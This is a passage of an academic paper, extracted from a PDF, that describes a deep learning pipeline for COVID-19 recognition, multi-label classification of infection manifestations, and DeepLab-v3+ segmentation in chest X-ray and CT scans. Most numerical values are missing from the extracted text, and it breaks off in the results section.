egypt department of electronics and communications engineering, arab academy for science, technology, and maritime transport, alexandria, egypt abstract we are concerned with the challenge of coronavirus disease (covid- ) detection in chest x-ray and computed tomography (ct) scans, and the classification and segmentation of related infection manifestations. even though it is arguably not an established diagnostic tool, using machine learning-based analysis of covid- medical scans has shown the potential to provide a preliminary digital second opinion. this can help in managing the current pandemic, and thus has been attracting significant research attention. in this research, we propose a multi-task pipeline that takes advantage of the growing advances in deep neural network models. in the first stage, we fine-tuned an inception-v deep model for covid- recognition using multi-modal learning, that is, using x-ray and ct scans. in addition to outperforming other deep models on the same task in the recent literature, with an attained accuracy of . %, we also present comparative analysis for multi-modal learning against learning from x-ray scans alone. the second and the third stages of the proposed pipeline complement one another in dealing with different types of infection manifestations. the former features a convolutional neural network architecture for recognizing three types of manifestations, while the latter transfers learning from another knowledge domain, namely, pulmonary nodule segmentation in ct scans, to produce binary masks for segmenting the regions corresponding to these manifestations. our proposed pipeline also features specialized streams in which multiple deep models are trained separately to segment specific types of infection manifestations, and we show the significant impact that this framework has on various performance metrics. we evaluate the proposed models on widely adopted datasets, and we demonstrate an increase of approximately . % and . % for dice coefficient and mean intersection-over-union (miou), respectively, while achieving % reduction in computational time, compared to the recent literature. subjects bioinformatics, computer vision, data mining and machine learning keywords covid- , deeplab, medical imaging, pneumonia, transfer learning, multimodal learning how to cite this article el-bana s, al-kabbany a, sharkas m. . a multi-task pipeline with specialized streams for classification and segmentation of infection manifestations in covid- scans. peerj comput. sci. :e doi . /peerj-cs. submitted june accepted september published october corresponding author ahmad al-kabbany, alkabbany@aast.edu, alkabbany@ieee.org academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright el-bana et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:alkabbany@�aast.�edu mailto:alkabbany@�ieee.�org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ introduction the severe acute respiratory syndrome coronavirus (sars-cov- ) of the coronaviridae study group of the international committee on taxonomy of viruses ( ) is a strain of severe acute respiratory syndrome-related coronavirus (sars-cov or sarsr-cov). the latter is a species of coronaviruses, which are a group ribonucleic acid (rna) viruses. sars-cov- causes an infectious respiratory disease that is known as the coronavirus disease (covid- ), since it was first identified in december , following a pneumonia outbreak lai et al. ( ), sharfstein, becker & mello ( ). the first human-to-human transmission was confirmed in january chan et al. ( ), and the world health organization (who) declared a pandemic on the th of march . over three million confirmed cases to date, hundreds of thousands of deaths, and a severe socioeconomic impact in hundreds of countries that are hit by the virus (li et al., b; wu, leung & leung, ) have induced significant efforts from governmental, public, and private sectors worldwide to manage the pandemic. one principal aspect of pandemic management and future epidemic prevention is the development of effective, efficient, and scale-able diagnostic tools. there are several diagnostic tools that have been used, or currently under development, for sars-cov- . to the best of our knowledge, nucleic acid tests are the most established and the most widely used tool to date (tahamtan & ardebili, ); in particular, the polymerase chain reaction (pcr) and its variants, such as quantitative pcr (qpcr) and reverse transcription pcr (rt-pcr). pcr is a dna and rna cloning technique that is used to amplify/augment dna/rna samples required in micro biology studies. even though it is characterized by high sensitivity and specificity, in addition to rapid detection, it is prone to producing false negatives. in part, this is due to the localized nature of the sample acquisition process, mainly as nasal, throat, and nasopharyngeal swabs, that is, an active virus could be present elsewhere along the respiratory tract. there are also other limitations for pcr-based tests including universal availability, especially amidst shortage of supplies, slow turnaround times, depending on the resources of the lab, and in many cases, it is required to repeat the tests several times before they can be confirmed (chu et al., ). other diagnostic tools include antibody tests which can give an indication on whether a person was previously infected by the virus. however, they are still not well established; hence, they are not widely used. it is worth mentioning that the recent literature features recommendations for combining more than one diagnostic tool. tahamtan & ardebili ( ), for example, suggested the adoption of a combination of qrt-pcr and ct scans for robust management of covid- . using ct scans and other modalities, such as x-ray, falls under an ever-growing area of high-paced research, namely, medical imaging diagnostics. it has been emerging as a reliable disease diagnosis tool, with several recent research findings referring to a performance that is on-par with human performance (liu et al., ; shen et al., ). in a large part, this is due to the advances that are taking place in developing new machine learning techniques. this has resulted in the emergence of the human-in-the-loop el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (hitl) ai framework (patel et al., ), in order to harness the power of both approaches while avoiding their respective limitation simultaneously. for the current pandemic, though, using imaging as a first-line diagnostic tool for covid- has been controversial to date (hope et al., ; fang et al., ; zu et al., ; ai et al., ). meanwhile, to the best of our knowledge, there is a consensus on the possibility of using medical imaging as a digital second opinion, or a complement, to the gold standard pcr-based tests. for example, he et al. ( ) and chen et al. ( ), respectively, highlighted ct scans as either a tool with comparable diagnostic performance as initial rt-pcr, or an important screening tool especially for patients who have initial negative results for the rt-pcr test. accordingly, highly-paced research has been devoted to harness the potential of deep learning-based medical imaging diagnostics, towards the goal of providing a rapid, accurate, scale-able, and affordable diagnosis. deep neural network models have shown a considerable potential with regards to automatic detection of lung diseases (el-bana, al-kabbany & sharkas, ; polat & danaei mehr, ; nasrullah et al., ). thanks to their ability to extract and learn meaningful features, deep models can provide an effective alternative to manual labeling by radiologists—a task that is highly impacted by individual clinical experiences. recent literature highlights the adoption of deep neural networks to analyze x-ray and ct scans, in order to recognize/classify covid- from healthy subjects. moreover, covid- virus has a bilateral distribution of patchy shadows and ground glass opacity in early stages, which progress to multiple ground glass opacities and infiltrations in both lungs (wang et al., ). these features are very similar to other types of pneumonia with only slight differences that are difficult to be distinguished by radiologists. hence, deep models have been used to recognize/classify covid- from other types of pneumonia, including bacterial and viral pneumonia (narin, kaya & pamuk, ; wang & wong, ; song et al., ). deep models have also been used in the quantification and the segmentation of infection manifestations such as ground-glass opacity (ggo) and pulmonary consolidation, in early and late stages of infection, respectively (ye et al., ; ai et al., ). in this research, we are inspired by a typical flow in a real-life scenario where a radiologist would employ a deep learning-empowered screening system, first, to recognize/diagnose covid- , then to quantify and segment infection manifestations in x-ray and ct scans. the development of multi-task pipelines has been the scope for previous research (amyar, modzelewski & ruan, ). nevertheless, we demonstrate either competitive or superior performance compared to the recent literature at every stage of the proposed pipeline. the following points summarize the principal contributions of this research: . we outperformed the recent literature on covid- recognition by attaining a classification accuracy of . % for the two-class problem, that is (covid- / non-covid- ) and . % for the four-class problem of recognizing covid- among scans that involve normal cases, other types of pneumonia, in addition to covid- . to achieve this performance, we propose a training procedure that involves el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fine-tuning of an inception-v architecture. we present the performance of this architecture under varying learning parameters, and using different performance metrics. . for the same stage, we show comparative analysis for learning using x-ray scans only against learning from x-ray and ct scans combined, that is, multi-modal learning, and we demonstrate a potential advantage for the latter. . we propose a cnn architecture for multi-label recognition/classification (ml-cnn) of different types of lung infection manifestations. particularly, we solve the problem of identifying the probabilities of having infection manifestations, such as ground glass opacities (ggo), pleural effusion (pe), and consolidation, in medical scans. this is envisaged to have a potential role in the early diagnosis of covid- . it is worth mentioning that this problem was not addressed by previous work on multi-task pipelines for covid- (amyar, modzelewski & ruan, ). . we adapt knowledge from another domain, namely, pulmonary nodule detection, to enhance the segmentation of lung infections in chest ct scans. particularly, we employ our own previous work (el-bana, al-kabbany & sharkas, ) on improving semantic segmentation of pulmonary nodules using the recently proposed deeplab-v + architecture. moreover, using xception network as a feature extractor backbone, we evaluate the performance of the deeplab model, which suits client-side applications. . we propose a new learning procedure for semantic segmentation of infection manifestations. it involves the training of multiple streams, each of which is specialized to segment a specific type of manifestations. we demonstrate the effectiveness of this procedure over single stream-based segmentation, and compared to the recent literature, we attain an increase of approximately . % and . % for mean intersection- over-union (miou) and dice coefficient, respectively. the rest of the article is organized as follows: previous research that incorporates deep learning methods for covid- diagnosis and infection segmentation is presented in “related work”. “proposed methods” discusses the proposed multi-stage pipeline, and we elaborate on the adopted datasets, data augmentation methods, and pre-processing techniques. “results and discussion” is dedicated to highlight and discuss the experimental results, and finally the work is concluded in “conclusion”. related work this research intersects with four main areas in the literature, namely, covid- recognition based on deep models, segmentation of covid- -related infection manifestations based on deep models, multi-task pipelines that have the ability to accomplish both tasks, and multi-stream recognition pipelines. in the rest of this section, we highlight the most relevant (to the proposed work) in these four areas. the literature on covid- diagnosis features end-to-end deep models as well as transfer learning approaches. sethy & behera ( ), for example, proposed a covid- classification method in x-ray images using deep features that are computed using a el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pre-trained convolutional neural network (cnn) model, and an svm classifier. this method attained an accuracy of . % with the resnet model employed as the feature extractor. in li et al. ( a), a retrospective, single-center, study was conducted on patients. they aimed at investigating the correlation between ct-based manifestations and clinical classification of covid- . with an attained sensitivity of . % and a specificity of . %, they concluded that ct-based quantitative analysis is highly correlated with the clinical classification of covid- . they also pointed out that ct visual quantitative analysis is highly consistent in terms of the total severity score that was introduced in their research. ozkaya, ozturk & barstugan ( ) used a dataset of ct scans to generate two sub-datasets of × and × patches. deep features were then computed and an svm classifier was trained on producing binary labels. they also proposed a novel method for feature ranking and fusion to enhance the performance of the proposed approach. an accuracy of . % and . % sensitivity were attained on the latter sub-dataset of patches. a weakly-supervised software system was developed in zheng et al. ( ). it adopts deep learning and uses d ct volumes to detect covid- , achieving a specificity and sensitivity of . and . , respectively. the u-net model is a cnn that was proposed by ronneberger, fischer & brox ( ), and is among the widely-adopted neural networks in medical image segmentation. it was further extended to d u-net (Çiçek et al., ), and unet++ (zhou et al., ) that showed promising performance on various image segmentation tasks. zhou, canu & ruan ( ) proposed a u-net-based segmentation technique that addressed covid- , and that employed an attention mechanism on ct slices. they obtained a dice score of . %. in our previous work (el-bana, al-kabbany & sharkas, ), deeplab-v + (chen et al., ) was shown to outperform u-net in pulmonary nodule segmentation. fan et al. ( ) proposed a novel covid- deep model for lung infection segmentation (inf-net) to identify infected regions from chest ct scans in an automated manner. on ground glass opacities and consolidation, inf-net achieved a dice coefficient of . and . , respectively. also, elharrouss, subramanian & al-maadeed ( ) proposed a deep-learning-based, multi-task, two-stage approach for infection segmentation in ct-scans. the first stage involves the possibly-infected lung regions, which is followed by segmenting the infections in these regions. amyar, modzelewski & ruan ( ) proposed a deep learning model that jointly identifies covid- and segments the related lesions in chest ct scans. their three-arm model consisted of a common encoder and two decoders for image reconstruction and segmentation, where the image reconstruction stage is meant to enhance feature representation. the third arm featured a multi-layer perceptron neural network for covid- recognition, that is, a binary classification problem. for the segmentation task, they achieved a dice coefficient of . . wu et al. ( ) proposed a covid- classification and segmentation system, that was trained on a dataset containing , ct scans, collected from covid- patients and uninfected cases. their jcs model achieved a . % dice coefficient on the segmentation test set, and a sensitivity of . %, and a specificity of . % on the classification test set. el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ deep networks with multiple streams have been employed in visual recognition applications. to the best of our knowledge, simonyan & zisserman ( ) were the first to adopt a two-stream convnet architecture, which incorporates spatial and temporal networks, for action recognition in videos. the proposed architecture involved training the second stream on optical flow, and it was shown to attain a very good performance despite limited data. following the work of simonyan & zisserman ( ), other multi-stream techniques that adopt other modalities (zhang et al., ) were proposed. in contrast to these previous techniques, our proposed multi-stream approach for segmenting infection manifestations trains each stream on a different label, rather than training each stream on a different modality of the whole dataset (all the labels). the latter is still a point of future research, though. proposed methods a machine learning-empowered system for covid- diagnostics inherently involves multiple tasks. as a digital second opinion for radiologists, the system would first be required to recognize covid- in medical scans. it might further be asked to differentiate between covid- and other types of pneumonia. following the recognition of covid- , the system would be required to identify the probability of presence of different infection manifestations, and would further be asked to segment the regions corresponding to these manifestations accurately. figure depicts the proposed pipeline which realizes the aforementioned tasks. first, we employ the inception-v model for image classification, particularly, for covid- recognition. second, we train a figure the block diagram of the proposed method. full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ multi-label classifier to infer the probability of different types of infection manifestations, namely, ground glass opacities (ggo), pleural effusion (pe), and consolidation. the third stage involves feeding covid- ct scans to deeplab-v + model, which produces binary segmentation masks that highlight the regions corresponding to infection manifestations. to alleviate the impact of the limited amount of data, we use data augmentation techniques throughout the proposed pipeline. in the rest of this section, we elaborate on the datasets that are used for the training and testing of the proposed models, we elaborate on the adopted data augmentation techniques, and we discuss the implementation details of each of the three stages in the pipeline. datasets to the best of our knowledge, the research community still lacks a comprehensive dataset that involves ct and/or x-ray scans and that suits both diagnosis and segmentation tasks at the same time. this necessitates the reliance on multiple datasets if the goal is to develop a multi-task pipeline. for training the proposed deep models, we used the following datasets, which involve two of the most widely used datasets in the recent literature (fan et al., ): . covid- ct segmentation dataset: this dataset includes axial ct images from patients with covid- . the images were segmented by a radiologist using three labels: ground-glass, consolidation and pleural effusion. figure shows an example of ct covid- slice from the dataset. . the covid- image data collection repository on github: this dataset is hared by dr. joseph cohen. it is a growing collection of deidentified chest x-rays (cxrs) and ct scans from covid- cases internationally (cohen, morrison & dao, ). . the rsna pneumonia detection challenge dataset: this dataset is available on kaggle, and it contains several deidentified cxrs and includes a label indicating whether the image shows evidence of pneumonia. figure shows different examples of x-ray images from the dataset. preprocessing and data augmentation all medical scans were resized to have the shape of × × . the contrast limited adaptive histogram equalization (clahe) method is used for enhancing small details, textures and local contrast of the images (zuiderveld, ). local details can therefore be enhanced even in the regions that are darker or lighter than most of the image (koonsanit et al., ). to avoid over-fitting, since the number of ct volumes is limited, we applied data augmentation strategies such as random transformations. these transformations include rotation, horizontal and vertical translations, zooming and shearing. for each training sample, the transformation parameters were randomly generated and the augmentation was identically applied for each slice in the sampled image. we augmented each training sample times, and each validation and test sample times. the augmentation for the training, validation and testing datasets, rather than the training dataset only, is done in accordance with recent findings on the impact of el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ test-time augmentation on the system performance (perez et al., ). more details about the medical scans included in the adopted datasets are summarized in table , such as the types of involved cases, the number of slices in each case and their modalities, and the total number of slices after augmentation. table details of the medical scans included in the adopted datasets, such as the cases available, the number of slices in each case and their modalities, the total number of slices after augmentation, and the task supported by each type of slices. case modality #slices total after augmentation task covid- covid- x-rays , diagnosis covid- (with segmented masks) ct scan , diagnosis + segmentation pneumonia bacterial pneumonia x-rays , diagnosis viral pneumonia x-rays , diagnosis normal normal x-rays , diagnosis figure an example of a ct scan. (a) covid- ct axial slice, (b) ground truth segmented mask. the white regions in the latter represent the consolidation, while the dark gray regions represent pleural effusion, and light gray regions represent ground-glass opacities. please see sub-section . full-size doi: . /peerj-cs. /fig- figure examples of input x-ray images from the adopted datasets. (a) covid- , (b) normal, (c) pneumonia bacteria, (d) pneumonia virus. please see subsection . full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ covid- recognition using transfer learning on the inception-v architecture the inception-v architecture is an evolution of the googlenet architecture. prior to googlenet, such as in the alexnet and vggnet architectures, a standard structure for cnnc consisted of stacked convolutional layers, max-pooling, and full-connected layers. to avoid over-fitting, computational demand, and exploding or vanishing gradients, the inception architecture encouraged sparsity through local sparse structures, namely, the inception modules/blocks. each of these blocks consists of four paths, and contains filters (convolutions) of different sizes, providing the ability to extract patterns at different spatial sizes. convolutional layers that consist of × filters were used to make the network deeper, and to reduce the model’s complexity and the number of parameters, by reducing the number of input channels. the × convolutional layers also add more non-linearity by using relu after each × convolutional layer (mahdianpari et al., ). the fully connected layer in this architecture is replaced with a global average pooling layer. in comparison to googlenet, incpetion-v featured the factorization of convolutions into smaller convolutions, while incpetion-v extended incpetion-v by batch-normalization of the fully connected layer of the auxiliary classifier (szegedy et al., ). figure depicts a compressed view of the inception-v (xia, xu & nan, ) model. in the first stage of the proposed pipeline, we fine-tuned an incpetion-v architecture, which consists of a feature extraction stage, followed by a classification stage. instead of training the whole architecture from scratch, we started from a model that is pre-trained on imagenet. we left the weights of the pre-trained model untouched while the final layer is retrained from scratch. the number of classes in the dataset determines the number of output nodes in the last layer. in “results and discussion”, we discuss the impact of varying learning parameters, such as the number of steps and the learning rate, figure a schematic diagram of the inception-v architecture, inspired by the research in szegedy et al. ( ). full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ on the attained accuracy. we also demonstrate the performance of fine-tuning using multi-modal data, that is, x-rays and ct scans, as compared to fine-tuning using x-rays only. a cnn architecture for multi-label recognition of infection manifestations in chest ct scans there are several differences between the proposed pipeline and previous work on multi-task models for covid- (amyar, modzelewski & ruan, ). one principal difference, though, is that the second stage of our pipeline addresses a problem that was not handled by previously proposed models (amyar, modzelewski & ruan, ), namely, the inference of the probabilities of presence of different infection manifestations, namely, ground glass opacities (ggo), pleural effusion (pe), and consolidation. given that the output of the segmentation stage is a binary mask, important insights are missing with regards to the types of manifestations that correspond to the segmented regions, that is, the white regions in the output mask. covid- ct scans have featured three types of manifestations, namely, ground-glass opacity, consolidation and pleural effusion. moreover, a scan may include one or more types of infections; hence it is a multi-label image recognition/classification problem. towards the goal of recognizing different manifestations, we propose the cnn architecture that is shown in fig. . the output of this architecture is a vector of three probabilities for the presence of ground-glass opacities, consolidations and pleural effusion in a ct scan. in a sense, the output of this stage complements the information obtained from binary segmentation masks, which will be addressed by the third stage of the pipeline. in addition, we envisage the second stage to have a significant role in early diagnosis even if the output from the first stage does not indicate signs for covid- . figure the proposed cnn model for multi-label classification of infection manifestations. as depicted in the figure, the output from the model are the probabilities of having different types of infection manifestations in chest ct scans. full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the convolutional layers consist of m kernels of size n × n. max-pooling is applied in non-overlapping windows of size × . every max-pooling reduces the size of each patch by half. two dense layers with and neurons respectively are used with a dropout of . to avoid over-fitting, and the elu activation function is applied. the last layer is a dense layer for image classification using a sigmoid function to obtain the multi-label predictions and a cross entropy as the loss function. for n > , that is, multi-label classification, we calculate a separate loss per observation for each class label and sum the result as follows: loss ¼ � xn i¼ yi logðŷiÞ ( ) where, n is the number of classes, y is the corrected label, ŷ is a predicted output. another principal difference between the proposed model and the work in amyar, modzelewski & ruan ( ) is that we deal with each task in the pipeline separately, that is, there is no common encoder. hence, we are able to harness the power of different architectures in each task. this becomes apparent in the third stage where we adopted the deeplab-v + model for segmentation, which was shown to achieve significantly better results (el-bana, al-kabbany & sharkas, ) compared to u-net that was adopted in amyar, modzelewski & ruan ( ). segmenting infection manifestations with knowledge adaptation from pulmonary nodule segmentation the third stage of the proposed pipeline uses the first dataset in sub-section , and is concerned with pixel-level segmentation of the regions corresponding to infection manifestations in ct scans. we capitalize on our previous research work in el-bana, al-kabbany & sharkas ( ) in which we employed the deeplab-v + model with ct scans to enhance the segmentation of pulmonary nodules, and in which we attained competitive results compared to the recent literature. the deeplab-v + model was developed by google, and it involves a simple decoder module to refine the segmentation masks along object boundaries. the model is fed with a single ct slice, and the corresponding ground truth mask showing the lesion locations is expected at the output. we explain the elements of the adopted model as follows: . atrous separable convolution: this form of convolution (chen et al., ) is meant to reduce the complexity of the proposed model without compromising the performance. it is applied in the depth-wise convolution, where a depth-wise separable convolution replaces the standard convolution with two consecutive steps, namely, a depth-wise convolution followed by a point-wise convolution (i.e., × convolution). for d signals, each location i on the output feature map y, atrous convolution is computed as follows: y½i� ¼ x k ½xi þ r:k�w½k�; ( ) el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where w is a convolution filter. the stride with the sampled input signal is determined by the atrous rate r. standard convolution, though, is a particular case with r = . . encoder: in segmentation tasks, objects in images as well as their locations represent the essential information required to accomplish successfully the computation of segmentation masks. this information is expected to get extracted by the encoder. in the proposed pipeline, the primary feature extractor in the deeplab-v + model is an aligned xception model—a modified version of the xception- model (chollet, ). xception is a modified version of the inception module, in which incpetion modules are replaced with separable depth convolutions. moreover, in aligned xception, we use depthwise separable convolution with striding instead of all the maximum pooling operations. after each × depthwise convolution, extra batch normalization and relu activation are applied. also, the depth of the model is increased without varying the entry flow of the network structure. figure depicts the modified xception model. . decoder: in this stage, the features computed during the encoding phase are employed to compute the segmentation masks. first, we bilinearly-upsample the encoder features by a factor of , before we concatenate them with the corresponding low-level features. × convolution is used on the low-level features before concatenation, in order to decrease the number of channels. after the concatenation, × convolutions are applied to enhance the features, which is followed by another bilinear upsampling by a factor of , as shown in the deeplab-v + model in fig. . in this work, we started from a pre-trained deeplab-v + model. particularly, we adapt another knowledge domain, namely, the pulmonary nodule segmentation, to enhance the segmentation of covid- manifestations in ct-scans. we used the pre-trained model weights that were obtained in el-bana, al-kabbany & sharkas ( ). furthermore, since we focus on the enhancement of segmentation masks, we propose a new learning procedure that involves specialized streams, each of which features a deeplab-v + model that trains to segment a specific type of manifestations. in the next section, we present the results of the proposed pipeline, and we elaborate on the gain of training multiple specialized streams as compared to a single-stream pipeline. results and discussion all the simulations were carried out on a machine with a geforce gtx ti gpu, and gb of vram. we used python as the primary programing language and tensorflow as the backbone in all the experiments. this research implements a new multi-task pipeline that is capable of accomplishing the following types of tasks: ( ) covid- classification in x-rays and ct scans, ( ) multi-label recognition of covid- manifestations in ct scans, and ( ) and segmentation of covid- manifestations in ct scans. we adopted the most commonly used performance metrics in the respective areas, that is, for classification and segmentation, which are: sensitivity, specificity, accuracy, precision, f -score, dice coefficient (dsc), intersection over union (iou), and matthews el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ correlation coefficient (mcc). the mathematical expressions for computing the aforementioned metrics are are given by: accuracy ¼ tp þ tn tp þ tn þ fp þ fn ; ( ) senstivity ¼ tp tp þ fn ; ( ) specificity ¼ tn tn þ fp ; ( ) precision ¼ tp tp þ fp ; ( ) mcc ¼ ðtp � tnÞ � ðfn � fpÞffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi ðtp þ fnÞ � ðtn þ fpÞ � ðtp þ fpÞ � ðtn þ fnÞ p ; ( ) f ‐score ¼ � precision:recall precision þ precision ; ( ) dsc ¼ a t bj j aj j þ bj j ; ( ) figure the modified xception model (chen et al., ) which is used as the backbone (feature extractor) for the deeplab-v + model in the segmentation stage of the proposed pipeline. full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ iou ¼ tp tp þ fp þ fn ; ( ) where tp, fp, fn, and tn are the number of true positives, false positives, false negatives, and true negatives, respectively. for the segmentation task, our training set contains , covid- images and the test set has images. for the classification task, however, the training set contains the , images, and images are included in the test set. for the two-class version of the classification problem, that is, covid- vs. normal, the total number of training images are , , and images are included in the test set. train-test split was used for the evaluation in the three tasks. in the rest of this section, we refer to the covid- classification of stage as task , to the multi-label recognition problem of stage as task , and the segmentation problem of stage as task . results of task : classification using a fine-tuned inception-v model for fine-tuning the inception-v model, we used a batch size of for , steps/ iterations. starting from a pre-trained model on imagenet, we removed the weights of the last layer and re-trained it using x-ray and ct scans. for the four-class version of the recognition problem, that is, covid- , normal, viral pneumonia, and bacterial pneumonia, the number of output nodes that is equal to the number of the classes is set to . for the two-class version of the recognition problem, that is, covid- and normal, the number of output nodes is set to . the last layer of the model was trained with the back-propagation algorithm, and the weight parameter is adjusted using the cross-entropy cost function by calculating the error between the softmax layer output and the specified sample class label vector. table summarizes the results of the fine-tuned inception-v model using . learning rate on the two-class and the four-class problems. after , steps for classes, we achieved an accuracy of . %, . %, and . % for the training, validation and testing, respectively. for classes, however, we achieved an accuracy of . %, . %, and . % for the training, validation and testing respectively. the confusion matrices of the two- class and four-class cases are shown in figs. a and b respectively. we also show the variations of the accuracy and cross-entropy for that model for classification of classes in fig. . we also compared the performance of the adopted model with other models in the recent literature. table presents a summary of the accuracy, sensitivity, specificity, precision, f -score and mcc attained by different architectures. we demonstrate that the transfer learning approach with inception-v surpassed all other architectures by table classification results of the fine-tuned inception-v model for the two-class and the four-class covid- recognition problems. please see text for more details. # of classes training accuracy (%) validation accuracy (%) test accuracy (%) training cross entropy validation cross entropy classes . . . . . classes . . . . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ achieving a . % accuracy in case the training was done using x-rays only. we further tried to train using multi-modal data, that is, using x-rays and ct scans, and we achieved a . % accuracy. we argue that the increase in the attained accuracy, using figure the variation of accuracy and cross-entropy using the inception-v model with -classes x-ray dataset. (a) the variation of accuracy. (b) the variation of cross-entropy. full-size doi: . /peerj-cs. /fig- figure confusion matrices of the fine-tuned inception-v model for the two-class and the four- class covid- recognition problems. (a) confusion matrix for two classes, (b) confusion matrix for four classes. full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ multi-modal data, is due to the d cues that are provided by, and inherently exist, in ct scans, but are missing in x-rays. it is worth mentioning that in order to avoid imbalanced data, we made sure that we have an equal number of x-rays and ct scans when we trained with multi-modal data. particularly, we under-sampled the x-rays so that we get a number equal to the number of available ct scans. the under-sampling was done randomly, and we report the results that corresponds to the average of runs. complete results for each of the runs are given in table . it is worth mentioning that due to the limited number of available ct scans, uni-modal learning (using x-rays only) was carried out using a larger number of scans, yet multi-modal learning attained a slightly higher accuracy— . % for the former vs. . % for the latter. we report this comparison to highlight that multi-modal learning is worth further exploration when larger number of ct scans becomes available. table comparing the recognition performance of the proposed model with other models in the recent literature. method modality accuracy (%) senstivity (%) specificty (%) precision (%) f -score (%) fpr mcc (%) -classes alexnet (loey, smarandache & khalifa, ) x-ray . . – . . – – resnet (loey, smarandache & khalifa, ) x-ray . . – . . – – shufflenet + svm (sethy & behera, ) x-ray . . – – . . – googlenet (loey, smarandache & khalifa, ) x-ray . . – . . – – cnn (zhao et al., ) ct . . – . . – – inception-v + svm (sethy & behera, ) x-ray . . – – . . – densenet + svm (sethy & behera, ) x-ray . . – – . . – xceptionnet + svm (sethy & behera, ) x-ray . . – – . . – vgg- + svm (sethy & behera, ) x-ray . . – – . . – inceptionresnetv + svm (sethy & behera, ) x-ray . . – – . . – ours tl-incep-v x-ray . . . . . – -classes dre-net (song et al., ) ct . . . densenet ct . . . . . – – vgg- ct . . . . . . . resnet- ct . . . . . . . googlenet ct . . . . . . . ozkaya, ozturk & barstugan ( ) ct . . . . . . . mobilenet v x-ray . . . – – – – vgg x-ray . . . – – – – ours tl-incep-v x-ray . . . . . . . ours tl-incep-v ct + x-ray . . . . . . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ results of task : multi-label classification of infection manifestations in ct scans in the multi-label classifier, each convolutional layer is followed by maxpooling and dropout regularization of % to prevent the model from over-fitting. we used × filter for convolution and × for maxpooling, then, a flattening operation is carried out for classification. the activation function is elu for all the layers, except for the last one which is a sigmoid, in order to generate a probability for each label—ground glass, consolidation, and pleural effusion. the loss function is the binary cross-entropy and the metric is the accuracy, with adam as the optimizer (kingma & ba, ). the model was trained for epochs. figure shows the confusion matrix for the three labels in the table the prediction performance for the five runs which were carried out on two-class, multi-modal data (x-ray and ct scans). test no accuracy (%) senstivity (%) specificity (%) precision (%) f -score (%) fpr mcc test- . . . . . . test- . . . . . . test- . . . . . . test- . . . . . . test- . . . . . . . mean . . . . . . . figure the confusion matrix of the adopted multi-label classifier. full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ covid- dataset. more performance metrics are given in table . it is worth mentioning that we do not report a comparison between our performance at this stage and the recent literature. this is because, to the best of our knowledge, this research is the first to address the problem of recognizing different types of infection manifestations. even for the recently proposed multi-task model in amyar, modzelewski & ruan ( ), its recognition arm addressed binary classification, which is identical to the two-class problem addressed by stage of our pipeline. the segmentation stage in amyar, modzelewski & ruan ( ) did not address multi-label infection recognition either, as it was limited to produce binary masks. results of task : semantic segmentation of covid- infection manifestations using multiple specialized streams as mentioned in the previous section, we initialized the deeplab-v + model using the weights of the checkpoint used to segment the lung cancer nodules in our previous work (el-bana, al-kabbany & sharkas, ). we set the learning rate to . , the momentum to . , the weight decay to . , and the steps to , . we also adjusted the atrous rates as [ , , ] with an output stride of . in fig. , we present the output segmentation masks on the covid- validation set. the figure shows the segmentation output of each of the specialized streams, and the output of the all-class stream, that is, the single stream that was trained to segment all the classes of manifestations at the same time. to support subjective results with objective measures, we report in table the dice coefficient (dsc) and 